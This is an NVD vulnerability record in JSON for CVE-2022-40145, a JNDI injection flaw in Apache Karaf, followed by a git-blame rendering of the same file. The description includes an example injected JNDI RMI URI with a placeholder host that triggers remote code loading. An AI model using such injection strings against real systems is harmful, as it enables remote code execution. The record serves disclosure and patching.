nvd-json-data-feeds/CVE-2022/CVE-2022-401xx/CVE-2022-40145.json

{
  "id": "CVE-2022-40145",
  "sourceIdentifier": "security@apache.org",
  "published": "2022-12-21T16:15:08.930",
  "lastModified": "2023-11-07T03:52:06.600",
  "vulnStatus": "Modified",
  "descriptions": [
    {
      "lang": "en",
      "value": "This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.\n\nThe function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource\nuse InitialContext.lookup(jndiName) without filtering.\nAn user can modify\u00a0`options.put(JDBCUtils.DATASOURCE, \"osgi:\" +\u00a0DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,\"jndi:rmi://x.x.x.x:xxxx/Command\");` in JdbcLoginModuleTest#setup.\n\nThis is vulnerable to a remote code execution (RCE) attack when a\nconfiguration uses a JNDI LDAP data source URI when an attacker has\ncontrol of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.\n\nWe encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8"
    }
  ],
  "metrics": {
    "cvssMetricV31": [
      {
        "source": "nvd@nist.gov",
        "type": "Primary",
        "cvssData": {
          "version": "3.1",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "attackVector": "NETWORK",
          "attackComplexity": "LOW",
          "privilegesRequired": "NONE",
          "userInteraction": "NONE",
          "scope": "UNCHANGED",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9
      }
    ]
  },
  "weaknesses": [
    {
      "source": "nvd@nist.gov",
      "type": "Primary",
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ]
    },
    {
      "source": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
      "type": "Secondary",
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        },
        {
          "lang": "en",
          "value": "CWE-74"
        }
      ]
    }
  ],
  "configurations": [
    {
      "nodes": [
        {
          "operator": "OR",
          "negate": false,
          "cpeMatch": [
            {
              "vulnerable": true,
              "criteria": "cpe:2.3:a:apache:karaf:*:*:*:*:*:*:*:*",
              "versionEndExcluding": "4.3.8",
              "matchCriteriaId": "CEDC6799-2894-4DB9-A66B-9481580EDC66"
            },
            {
              "vulnerable": true,
              "criteria": "cpe:2.3:a:apache:karaf:*:*:*:*:*:*:*:*",
              "versionStartIncluding": "4.4.0",
              "versionEndExcluding": "4.4.2",
              "matchCriteriaId": "3320F4C0-A9F6-43C3-B473-1E56EFD0086D"
            }
          ]
        }
      ]
    }
  ],
  "references": [
    {
      "url": "https://karaf.apache.org/security/cve-2022-40145.txt",
      "source": "security@apache.org",
      "tags": [
        "Vendor Advisory"
      ]
    }
  ]
}
bootstrap 2023-04-24 12:24:31 +02:00			`{`
			`"id": "CVE-2022-40145",`
			`"sourceIdentifier": "security@apache.org",`
			`"published": "2022-12-21T16:15:08.930",`
Auto-Update: 2023-11-07T21:02:52.274489+00:00 2023-11-07 21:03:21 +00:00			`"lastModified": "2023-11-07T03:52:06.600",`
			`"vulnStatus": "Modified",`
bootstrap 2023-04-24 12:24:31 +02:00			`"descriptions": [`
			`{`
			`"lang": "en",`
Auto-Update: 2023-11-07T21:02:52.274489+00:00 2023-11-07 21:03:21 +00:00			"value": "This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.\n\nThe function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource\nuse InitialContext.lookup(jndiName) without filtering.\nAn user can modify\u00a0`options.put(JDBCUtils.DATASOURCE, \"osgi:\" +\u00a0DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,\"jndi:rmi://x.x.x.x:xxxx/Command\");` in JdbcLoginModuleTest#setup.\n\nThis is vulnerable to a remote code execution (RCE) attack when a\nconfiguration uses a JNDI LDAP data source URI when an attacker has\ncontrol of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.\n\nWe encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8"
bootstrap 2023-04-24 12:24:31 +02:00			`}`
			`],`
			`"metrics": {`
			`"cvssMetricV31": [`
			`{`
			`"source": "nvd@nist.gov",`
			`"type": "Primary",`
			`"cvssData": {`
			`"version": "3.1",`
			`"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",`
			`"attackVector": "NETWORK",`
			`"attackComplexity": "LOW",`
			`"privilegesRequired": "NONE",`
			`"userInteraction": "NONE",`
			`"scope": "UNCHANGED",`
			`"confidentialityImpact": "HIGH",`
			`"integrityImpact": "HIGH",`
			`"availabilityImpact": "HIGH",`
			`"baseScore": 9.8,`
			`"baseSeverity": "CRITICAL"`
			`},`
			`"exploitabilityScore": 3.9,`
			`"impactScore": 5.9`
			`}`
			`]`
			`},`
			`"weaknesses": [`
			`{`
			`"source": "nvd@nist.gov",`
			`"type": "Primary",`
			`"description": [`
			`{`
			`"lang": "en",`
Auto-Update: 2023-06-27T20:00:29.951267+00:00 2023-06-27 20:00:33 +00:00			`"value": "NVD-CWE-Other"`
bootstrap 2023-04-24 12:24:31 +02:00			`}`
			`]`
			`},`
			`{`
Auto-Update: 2023-11-07T21:02:52.274489+00:00 2023-11-07 21:03:21 +00:00			`"source": "f0158376-9dc2-43b6-827c-5f631a4d8d09",`
bootstrap 2023-04-24 12:24:31 +02:00			`"type": "Secondary",`
			`"description": [`
			`{`
			`"lang": "en",`
			`"value": "CWE-20"`
			`},`
			`{`
			`"lang": "en",`
			`"value": "CWE-74"`
			`}`
			`]`
			`}`
			`],`
			`"configurations": [`
			`{`
			`"nodes": [`
			`{`
			`"operator": "OR",`
			`"negate": false,`
			`"cpeMatch": [`
			`{`
			`"vulnerable": true,`
			`"criteria": "cpe:2.3:a:apache:karaf::::::::",`
			`"versionEndExcluding": "4.3.8",`
			`"matchCriteriaId": "CEDC6799-2894-4DB9-A66B-9481580EDC66"`
			`},`
			`{`
			`"vulnerable": true,`
			`"criteria": "cpe:2.3:a:apache:karaf::::::::",`
			`"versionStartIncluding": "4.4.0",`
			`"versionEndExcluding": "4.4.2",`
			`"matchCriteriaId": "3320F4C0-A9F6-43C3-B473-1E56EFD0086D"`
			`}`
			`]`
			`}`
			`]`
			`}`
			`],`
			`"references": [`
			`{`
			`"url": "https://karaf.apache.org/security/cve-2022-40145.txt",`
			`"source": "security@apache.org",`
			`"tags": [`
			`"Vendor Advisory"`
			`]`
			`}`
			`]`
			`}`